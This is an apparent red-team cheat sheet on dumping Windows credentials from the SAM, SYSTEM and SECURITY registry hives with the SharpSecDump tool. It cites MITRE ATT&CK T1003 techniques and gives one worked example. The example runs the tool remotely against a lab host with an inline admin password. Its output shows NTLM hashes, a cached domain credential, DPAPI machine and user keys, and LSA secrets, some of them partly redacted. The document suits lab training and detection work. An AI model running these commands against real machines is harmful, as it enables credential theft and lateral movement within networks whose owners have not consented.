==================================================================================================================================
OS Credential Dumping (Registries) using 'SharpSecDump'
==================================================================================================================================

Our objective is to:
- extract the password hashes of the local accounts stored in the registry hive HKLM\SAM 
  (the syskey to decrypt the registry hive HKLM\SAM is stored in the registry hive HKLM\SYSTEM)
- extract LSA secrets from registry (HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets)
- extract the cached password hashes (of domain accounts that logged on the Windows computer) stored in the registry hive HKLM\SECURITY 

A valid local or domain Windows account member of the 'local administrator' group is required copy the registry hives SAM/SYSTEM/SECURITY.

Usefull links: 
> https://attack.mitre.org/techniques/T1003/002/
> https://attack.mitre.org/techniques/T1003/004/

SharpSecDump is a .Net port of the remote SAM + LSA Secrets dumping functionality of impacket's script secretsdump.py. 
By default runs in the context of the current user.

> https://github.com/G0ldenGunSec/SharpSecDump


==================================================================================================================================
Example 1. Use 'SharpSecDump' to remotely dump the Windows password hashes, cached passwords and LSA secrets stored in the registry
           hives of a target Windows computer
==================================================================================================================================

PS C:\Users\Administrator\Documents\SharpSecDump\bin> .\SharpSecDump.exe  -target='172.18.8.22' -d=SECURITY-TEST-LAB.LOCAL -u=admin -p=PWD123!
[*] RemoteRegistry service started on 172.18.8.22
[*] Parsing SAM hive on 172.18.8.22
[*] Parsing SECURITY hive on 172.18.8.22
[*] Sucessfully cleaned up on 172.18.8.22

---------------Results from 172.18.8.22---------------

[*] SAM hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cda7ba90f97db93107a198969c<SNIP>
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

[*] Cached domain logon information(domain/username:hash)
SECURITY-TEST-LAB.LOCAL/svcwebserver:$DCC1$10240#svcadmin#80dcb7982483a2e56aaa9e<SNIP>

[*] LSA Secrets
[*] $MACHINE.ACC
SECURITY-TEST-LAB.LOCAL\server-mgmt$:aad3b435b51404eeaad3b435b51404ee:639c1adde3e0d1ba0d73390<SNIP>
[*] DPAPI_SYSTEM
dpapi_machinekey:cd727ffdc2ba531b5bece1afa0843e1412be653f
dpapi_userkey:09821c0a14ba4dd387ce5dc682a1e312ae599f6c
[*] NL$KM
NL$KM:51b8603fa314a49fe9b36fef67368bfd5cbb7a21631f9e1bc0854db4150f590265ead22e714a2b40cd92b2d<SNIP>
[*] _SC_MSSQLSERVER
SECURITY-TEST-LAB\svcwebserver:<SNIP>

---------------Script execution completed---------------

